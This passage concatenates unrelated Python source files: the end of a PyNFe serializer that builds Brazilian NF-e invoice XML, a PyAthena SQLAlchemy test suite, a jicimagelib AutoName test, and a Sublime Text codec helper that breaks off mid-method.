return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def importar(self, origem):
"""Cria as instancias do PyNFe a partir de arquivos XML no formato padrao da
SEFAZ e Receita Federal."""
raise Exception('Metodo nao implementado')
def _serializar_emitente(self, emitente, tag_raiz='emit', retorna_string=True):
raiz = etree.Element(tag_raiz)
        # Issuer data
etree.SubElement(raiz, 'CNPJ').text = so_numeros(emitente.cnpj)
etree.SubElement(raiz, 'xNome').text = emitente.razao_social
etree.SubElement(raiz, 'xFant').text = emitente.nome_fantasia
etree.SubElement(raiz, 'IE').text = emitente.inscricao_estadual
        # Address
endereco = etree.SubElement(raiz, 'enderEmit')
etree.SubElement(endereco, 'xLgr').text = emitente.endereco_logradouro
etree.SubElement(endereco, 'nro').text = emitente.endereco_numero
etree.SubElement(endereco, 'xCpl').text = emitente.endereco_complemento
etree.SubElement(endereco, 'xBairro').text = emitente.endereco_bairro
etree.SubElement(endereco, 'cMun').text = emitente.endereco_municipio
etree.SubElement(endereco, 'xMun').text = obter_municipio_por_codigo(
emitente.endereco_municipio, emitente.endereco_uf,
)
etree.SubElement(endereco, 'UF').text = emitente.endereco_uf
etree.SubElement(endereco, 'CEP').text = so_numeros(emitente.endereco_cep)
etree.SubElement(endereco, 'cPais').text = emitente.endereco_pais
etree.SubElement(endereco, 'xPais').text = obter_pais_por_codigo(emitente.endereco_pais)
etree.SubElement(endereco, 'fone').text = emitente.endereco_telefone
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_cliente(self, cliente, tag_raiz='dest', retorna_string=True):
raiz = etree.Element(tag_raiz)
        # Customer data
etree.SubElement(raiz, cliente.tipo_documento).text = so_numeros(cliente.numero_documento)
etree.SubElement(raiz, 'xNome').text = cliente.razao_social
etree.SubElement(raiz, 'IE').text = cliente.inscricao_estadual
        # Address
endereco = etree.SubElement(raiz, 'enderDest')
etree.SubElement(endereco, 'xLgr').text = cliente.endereco_logradouro
etree.SubElement(endereco, 'nro').text = cliente.endereco_numero
etree.SubElement(endereco, 'xCpl').text = cliente.endereco_complemento
etree.SubElement(endereco, 'xBairro').text = cliente.endereco_bairro
etree.SubElement(endereco, 'cMun').text = cliente.endereco_municipio
etree.SubElement(endereco, 'xMun').text = obter_municipio_por_codigo(
cliente.endereco_municipio, cliente.endereco_uf,
)
etree.SubElement(endereco, 'UF').text = cliente.endereco_uf
etree.SubElement(endereco, 'CEP').text = so_numeros(cliente.endereco_cep)
etree.SubElement(endereco, 'cPais').text = cliente.endereco_pais
etree.SubElement(endereco, 'xPais').text = obter_pais_por_codigo(cliente.endereco_pais)
etree.SubElement(endereco, 'fone').text = cliente.endereco_telefone
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_transportadora(self, transportadora, tag_raiz='transporta', retorna_string=True):
raiz = etree.Element(tag_raiz)
        # Carrier data
etree.SubElement(raiz, transportadora.tipo_documento).text = so_numeros(transportadora.numero_documento)
etree.SubElement(raiz, 'xNome').text = transportadora.razao_social
etree.SubElement(raiz, 'IE').text = transportadora.inscricao_estadual
        # Address
etree.SubElement(raiz, 'xEnder').text = transportadora.endereco_logradouro
etree.SubElement(raiz, 'cMun').text = transportadora.endereco_municipio
etree.SubElement(raiz, 'xMun').text = obter_municipio_por_codigo(
transportadora.endereco_municipio, transportadora.endereco_uf,
)
etree.SubElement(raiz, 'UF').text = transportadora.endereco_uf
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_entrega_retirada(self, entrega_retirada, tag_raiz='entrega', retorna_string=True):
raiz = etree.Element(tag_raiz)
        # Delivery/pickup data
etree.SubElement(raiz, entrega_retirada.tipo_documento).text = so_numeros(entrega_retirada.numero_documento)
        # Address
etree.SubElement(raiz, 'xLgr').text = entrega_retirada.endereco_logradouro
etree.SubElement(raiz, 'nro').text = entrega_retirada.endereco_numero
etree.SubElement(raiz, 'xCpl').text = entrega_retirada.endereco_complemento
etree.SubElement(raiz, 'xBairro').text = entrega_retirada.endereco_bairro
etree.SubElement(raiz, 'cMun').text = entrega_retirada.endereco_municipio
etree.SubElement(raiz, 'xMun').text = obter_municipio_por_codigo(
entrega_retirada.endereco_municipio, entrega_retirada.endereco_uf,
)
etree.SubElement(raiz, 'UF').text = entrega_retirada.endereco_uf
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_produto_servico(self, produto_servico, tag_raiz='det', retorna_string=True):
raiz = etree.Element(tag_raiz)
        # Product
prod = etree.SubElement(raiz, 'prod')
etree.SubElement(prod, 'cProd').text = str(produto_servico.codigo)
etree.SubElement(prod, 'cEAN').text = produto_servico.ean
etree.SubElement(prod, 'xProd').text = produto_servico.descricao
etree.SubElement(prod, 'CFOP').text = produto_servico.cfop
etree.SubElement(prod, 'uCom').text = produto_servico.unidade_comercial
etree.SubElement(prod, 'qCom').text = str(produto_servico.quantidade_comercial or 0)
etree.SubElement(prod, 'vUnCom').text = str(produto_servico.valor_unitario_comercial or 0)
etree.SubElement(prod, 'vProd').text = str(produto_servico.valor_total_bruto or 0)
etree.SubElement(prod, 'cEANTrib').text = produto_servico.ean_tributavel
etree.SubElement(prod, 'uTrib').text = produto_servico.unidade_tributavel
etree.SubElement(prod, 'qTrib').text = str(produto_servico.quantidade_tributavel)
etree.SubElement(prod, 'vUnTrib').text = str(produto_servico.valor_unitario_tributavel)
        # Taxes
imposto = etree.SubElement(raiz, 'imposto')
icms = etree.SubElement(imposto, 'ICMS')
icms_item = etree.SubElement(icms, 'ICMS'+produto_servico.icms_situacao_tributaria)
etree.SubElement(icms_item, 'orig').text = str(produto_servico.icms_origem)
etree.SubElement(icms_item, 'CST').text = produto_servico.icms_situacao_tributaria
etree.SubElement(icms_item, 'modBC').text = str(produto_servico.icms_modalidade_determinacao_bc)
etree.SubElement(icms_item, 'vBC').text = str(produto_servico.icms_valor_base_calculo)
etree.SubElement(icms_item, 'pICMS').text = str(produto_servico.icms_aliquota)
etree.SubElement(icms_item, 'vICMS').text = str(produto_servico.icms_valor)
pis = etree.SubElement(imposto, 'PIS')
pis_item = etree.SubElement(pis, 'PISAliq')
etree.SubElement(pis_item, 'CST').text = str(produto_servico.pis_situacao_tributaria)
etree.SubElement(pis_item, 'vBC').text = str(produto_servico.pis_valor_base_calculo)
etree.SubElement(pis_item, 'pPIS').text = str(produto_servico.pis_aliquota_percentual)
etree.SubElement(pis_item, 'vPIS').text = str(produto_servico.pis_valor)
cofins = etree.SubElement(imposto, 'COFINS')
cofins_item = etree.SubElement(cofins, 'COFINSAliq')
etree.SubElement(cofins_item, 'CST').text = str(produto_servico.cofins_situacao_tributaria)
etree.SubElement(cofins_item, 'vBC').text = str(produto_servico.cofins_valor_base_calculo)
etree.SubElement(cofins_item, 'pCOFINS').text = str(produto_servico.cofins_aliquota_percentual)
etree.SubElement(cofins_item, 'vCOFINS').text = str(produto_servico.cofins_valor)
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
    def _serializar_nota_fiscal(self, nota_fiscal, tag_raiz='infNFe', retorna_string=True):
raiz = etree.Element(tag_raiz, versao=self._versao)
        # Nota Fiscal data
ide = etree.SubElement(raiz, 'ide')
etree.SubElement(ide, 'cUF').text = CODIGOS_ESTADOS[nota_fiscal.uf]
etree.SubElement(ide, 'cNF').text = nota_fiscal.codigo_numerico_aleatorio
etree.SubElement(ide, 'natOp').text = nota_fiscal.natureza_operacao
etree.SubElement(ide, 'indPag').text = str(nota_fiscal.forma_pagamento)
etree.SubElement(ide, 'mod').text = str(nota_fiscal.modelo)
etree.SubElement(ide, 'serie').text = nota_fiscal.serie
etree.SubElement(ide, 'nNF').text = str(nota_fiscal.numero_nf)
etree.SubElement(ide, 'dEmi').text = nota_fiscal.data_emissao.strftime('%Y-%m-%d')
etree.SubElement(ide, 'dSaiEnt').text = nota_fiscal.data_saida_entrada.strftime('%Y-%m-%d')
etree.SubElement(ide, 'tpNF').text = str(nota_fiscal.tipo_documento)
etree.SubElement(ide, 'cMunFG').text = nota_fiscal.municipio
etree.SubElement(ide, 'tpImp').text = str(nota_fiscal.tipo_impressao_danfe)
etree.SubElement(ide, 'tpEmis').text = str(nota_fiscal.forma_emissao)
etree.SubElement(ide, 'cDV').text = nota_fiscal.dv_codigo_numerico_aleatorio
etree.SubElement(ide, 'tpAmb').text = str(self._ambiente)
etree.SubElement(ide, 'finNFe').text = str(nota_fiscal.finalidade_emissao)
etree.SubElement(ide, 'procEmi').text = str(nota_fiscal.processo_emissao)
etree.SubElement(ide, 'verProc').text = '%s %s'%(self._nome_aplicacao,
nota_fiscal.versao_processo_emissao)
        # Issuer
raiz.append(self._serializar_emitente(nota_fiscal.emitente, retorna_string=False))
        # Recipient
raiz.append(self._serializar_cliente(nota_fiscal.cliente, retorna_string=False))
        # Pickup
if nota_fiscal.retirada:
raiz.append(self._serializar_entrega_retirada(
nota_fiscal.retirada,
retorna_string=False,
tag_raiz='retirada',
))
        # Delivery
if nota_fiscal.entrega:
raiz.append(self._serializar_entrega_retirada(
nota_fiscal.entrega,
retorna_string=False,
tag_raiz='entrega',
))
        # Items
for num, item in enumerate(nota_fiscal.produtos_e_servicos):
det = self._serializar_produto_servico(item, retorna_string=False)
det.attrib['nItem'] = str(num+1)
raiz.append(det)
        # Totals
total = etree.SubElement(raiz, 'total')
icms_total = etree.SubElement(total, 'ICMSTot')
etree.SubElement(icms_total, 'vBC').text = str(nota_fiscal.totais_icms_base_calculo)
etree.SubElement(icms_total, 'vICMS').text = str(nota_fiscal.totais_icms_total)
etree.SubElement(icms_total, 'vBCST').text = str(nota_fiscal.totais_icms_st_base_calculo)
etree.SubElement(icms_total, 'vST').text = str(nota_fiscal.totais_icms_st_total)
etree.SubElement(icms_total, 'vProd').text = str(nota_fiscal.totais_icms_total_produtos_e_servicos)
etree.SubElement(icms_total, 'vFrete').text = str(nota_fiscal.totais_icms_total_frete)
etree.SubElement(icms_total, 'vSeg').text = str(nota_fiscal.totais_icms_total_seguro)
etree.SubElement(icms_total, 'vDesc').text = str(nota_fiscal.totais_icms_total_desconto)
etree.SubElement(icms_total, 'vII').text = str(nota_fiscal.totais_icms_total_ii)
etree.SubElement(icms_total, 'vIPI').text = str(nota_fiscal.totais_icms_total_ipi)
etree.SubElement(icms_total, 'vPIS').text = str(nota_fiscal.totais_icms_pis)
etree.SubElement(icms_total, 'vCOFINS').text = str(nota_fiscal.totais_icms_cofins)
etree.SubElement(icms_total, 'vOutro').text = str(nota_fiscal.totais_icms_outras_despesas_acessorias)
etree.SubElement(icms_total, 'vNF').text = str(nota_fiscal.totais_icms_total_nota)
        # Transport
transp = etree.SubElement(raiz, 'transp')
etree.SubElement(transp, 'modFrete').text = str(nota_fiscal.transporte_modalidade_frete)
        # Carrier
transp.append(self._serializar_transportadora(
nota_fiscal.transporte_transportadora,
retorna_string=False,
))
        # Vehicle
veiculo = etree.SubElement(transp, 'veicTransp')
etree.SubElement(veiculo, 'placa').text = nota_fiscal.transporte_veiculo_placa
etree.SubElement(veiculo, 'UF').text = nota_fiscal.transporte_veiculo_uf
etree.SubElement(veiculo, 'RNTC').text = nota_fiscal.transporte_veiculo_rntc
        # Trailer
reboque = etree.SubElement(transp, 'reboque')
etree.SubElement(reboque, 'placa').text = nota_fiscal.transporte_reboque_placa
etree.SubElement(reboque, 'UF').text = nota_fiscal.transporte_reboque_uf
etree.SubElement(reboque, 'RNTC').text = nota_fiscal.transporte_reboque_rntc
# Volumes
for volume in nota_fiscal.transporte_volumes:
vol = etree.SubElement(transp, 'vol')
etree.SubElement(vol, 'qVol').text = str(volume.quantidade)
etree.SubElement(vol, 'esp').text = volume.especie
etree.SubElement(vol, 'marca').text = volume.marca
etree.SubElement(vol, 'nVol').text = volume.numeracao
etree.SubElement(vol, 'pesoL').text = str(volume.peso_liquido)
etree.SubElement(vol, 'pesoB').text = str(volume.peso_bruto)
            # Seals
lacres = etree.SubElement(vol, 'lacres')
for lacre in volume.lacres:
etree.SubElement(lacres, 'nLacre').text = lacre.numero_lacre
        # Additional information
info_ad = etree.SubElement(raiz, 'infAdic')
etree.SubElement(info_ad, 'infAdFisco').text = nota_fiscal.informacoes_adicionais_interesse_fisco
etree.SubElement(info_ad, 'infCpl').text = nota_fiscal.informacoes_complementares_interesse_contribuinte
        # 'Id' attribute of the root tag
# Ex.: NFe35080599999090910270550010000000011518005123
raiz.attrib['Id'] = nota_fiscal.identificador_unico
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
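
# A minimal usage sketch (hypothetical; `fonte` stands for any data source
# exposing obter_lista(), as used by exportar() above):
#
#   serializador = SerializacaoXML(fonte, homologacao=True)
#   xml = serializador.exportar(retorna_string=True)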
# -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
"""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
"""
def create_engine(self, **kwargs):
conn_str = (
"awsathena+rest://athena.{region_name}.amazonaws.com:443/"
+ "{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"
+ "&compression=snappy"
)
if "verify" in kwargs:
conn_str += "&verify={verify}"
if "duration_seconds" in kwargs:
conn_str += "&duration_seconds={duration_seconds}"
if "poll_interval" in kwargs:
conn_str += "&poll_interval={poll_interval}"
if "kill_on_interrupt" in kwargs:
conn_str += "&kill_on_interrupt={kill_on_interrupt}"
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
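    # A representative URL built by create_engine above (placeholder
    # region/schema/bucket values):
    #   awsathena+rest://athena.us-west-2.amazonaws.com:443/test_schema
    #       ?s3_staging_dir=s3%3A%2F%2Fbucket%2Fpath%2F&s3_dir=...&compression=snappy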
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute("SELECT * FROM one_row").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
lambda: Table("this_does_not_exist", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
"this_does_not_exist",
MetaData(bind=engine),
schema="also_does_not_exist",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine))
version = float(
re.search(r"^([\d]+\.[\d]+)\..+", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=["col_int"], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #change-64ac776996da1a5c3e3460b4c0f0b257
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = "密林"
one_row = Table("one_row", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam("あまぞん", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn("default", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn("one_row", meta.tables)
self.assertIn("one_row_complex", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
"many_rows",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table("one_row", schema=SCHEMA))
self.assertFalse(insp.has_table("this_table_does_not_exist", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name="one_row", schema=SCHEMA)[0]
self.assertEqual(actual["name"], "number_of_rows")
self.assertTrue(isinstance(actual["type"], INTEGER))
self.assertTrue(actual["nullable"])
self.assertIsNone(actual["default"])
self.assertEqual(actual["ordinal_position"], 1)
self.assertIsNone(actual["comment"])
@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len("a string"))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
"a string",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b"123",
"[1, 2]",
"{1=2, 3=4}",
"{a=1, b=2}",
Decimal("0.1"),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
"""Presto uses double quotes, not backticks"""
fake_table = Table(
"select", MetaData(bind=engine), Column("current_timestamp", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == "a"))
self.assertIn('"select"', query)
self.assertIn('"current_timestamp"', query)
self.assertNotIn("`select`", query)
self.assertNotIn("`current_timestamp`", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
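        # Judging from the assertions below, the dialect retries only when the
        # database/table named in the error message does not match the one the
        # caller actually queried.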
exc = OperationalError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Namespace does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Table does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError("", None, "foobar.")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, "foobar", "foobar")
)
exc = ProgrammingError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type("boolean"), "boolean")
self.assertEqual(dialect._get_column_type("tinyint"), "tinyint")
self.assertEqual(dialect._get_column_type("smallint"), "smallint")
self.assertEqual(dialect._get_column_type("integer"), "integer")
self.assertEqual(dialect._get_column_type("bigint"), "bigint")
self.assertEqual(dialect._get_column_type("real"), "real")
self.assertEqual(dialect._get_column_type("double"), "double")
self.assertEqual(dialect._get_column_type("varchar"), "varchar")
self.assertEqual(dialect._get_column_type("timestamp"), "timestamp")
self.assertEqual(dialect._get_column_type("date"), "date")
self.assertEqual(dialect._get_column_type("varbinary"), "varbinary")
self.assertEqual(dialect._get_column_type("array(integer)"), "array")
self.assertEqual(dialect._get_column_type("map(integer, integer)"), "map")
self.assertEqual(dialect._get_column_type("row(a integer, b integer)"), "row")
self.assertEqual(dialect._get_column_type("decimal(10,1)"), "decimal")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d')
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT :word
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query, word="cat")
self.assertEqual(result.fetchall(), [("cat",)])
query_with_limit = (
sqlalchemy.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word="cat")
self.assertEqual(result_with_limit.fetchall(), [("cat",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d'), :word
"""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select(["*"]).select_from(table_expression1)
result1 = engine.execute(query1, word="cat")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), "cat")])
query_with_limit1 = (
sqlalchemy.select(["*"]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word="cat")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), "cat")]
)
select2 = sqlalchemy.sql.text(
"""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
"""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select(["*"]).select_from(table_expression2)
result2 = engine.execute(query2, param="b%")
self.assertEqual(result2.fetchall(), [("a string", "b%")])
query_with_limit2 = (
sqlalchemy.select(["*"]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param="b%")
self.assertEqual(result_with_limit2.fetchall(), [("a string", "b%")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan("string"))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float("nan")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = "to_sql_{0}".format(str(uuid.uuid4()).replace("-", ""))
df = pd.DataFrame(
{
"col_int": np.int32([1]),
"col_bigint": np.int64([12345]),
"col_float": np.float32([1.0]),
"col_double": np.float64([1.2345]),
"col_string": ["a"],
"col_boolean": np.bool_([True]),
"col_timestamp": [datetime(2020, 1, 1, 0, 0, 0)],
"col_date": [date(2020, 12, 31)],
# "col_binary": "foobar".encode(),
}
)
# Explicitly specify column order
df = df[
[
"col_int",
"col_bigint",
"col_float",
"col_double",
"col_string",
"col_boolean",
"col_timestamp",
"col_date",
# "col_binary",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists="replace",
method="multi",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
"a",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# "foobar".encode(),
)
],
)
@with_engine(verify="false")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs["verify"])
@with_engine(duration_seconds="1800")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs["duration_seconds"], 1800)
@with_engine(poll_interval="5")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt="false")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
|
"""Tests for the :class:`jicimagelib.io.AutoName` class."""
import unittest
class AutoNameTests(unittest.TestCase):
def test_import_AutoName_class(self):
# This throws an error if the class cannot be imported.
from jicimagelib.io import AutoName
def test_count(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.count, 0)
def test_directory(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.directory, None)
def test_suffix(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.suffix, '.png')
def test_name_callable(self):
from jicimagelib.io import AutoName
self.assertTrue(callable(AutoName.name))
def test_name_logic(self):
from jicimagelib.io import AutoName
def no_transform(image):
return image
self.assertEqual(AutoName.name(no_transform), '1_no_transform.png')
AutoName.directory = '/tmp'
self.assertEqual(AutoName.name(no_transform), '/tmp/2_no_transform.png')
if __name__ == '__main__':
unittest.main()
|
import sublime
import sys
import re
class CrossPlaformCodecs():
@classmethod
def decode_line(self, line):
line = line.rstrip()
decoded_line = self.force_decode(line) if sys.version_info >= (3, 0) else line
decoded_line = re.sub(r'\033\[(\d{1,2}m|\d\w)', '', str(decoded_line))
return decoded_line + "\n"
@classmethod
def force_decode(self, text):
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
if sublime.platform() == "windows":
text = self.decode_windows_line(text)
return text
@classmethod
def decode_windows_line(self, text):
# Import only for Windows
import locale, subprocess
# STDERR gets the wrong encoding, use chcp to get the real one
        process = subprocess.Popen(["chcp"], shell=True, stdout=subprocess.PIPE)
        (chcp, _) = process.communicate()
# Decode using the locale preferred encoding (for example 'cp1251') and remove newlines
chcp = chcp.decode(locale.getpreferredencoding()).strip()
# Get the actual number
chcp = chcp.split(" ")[-1]
# Actually decode
return text.decode("cp" + chcp)
@classmethod
def encode_process_command(self, command):
is_sublime_2_and_in_windows = sublime.platform() == "windows" and int(sublime.version()) < 3000
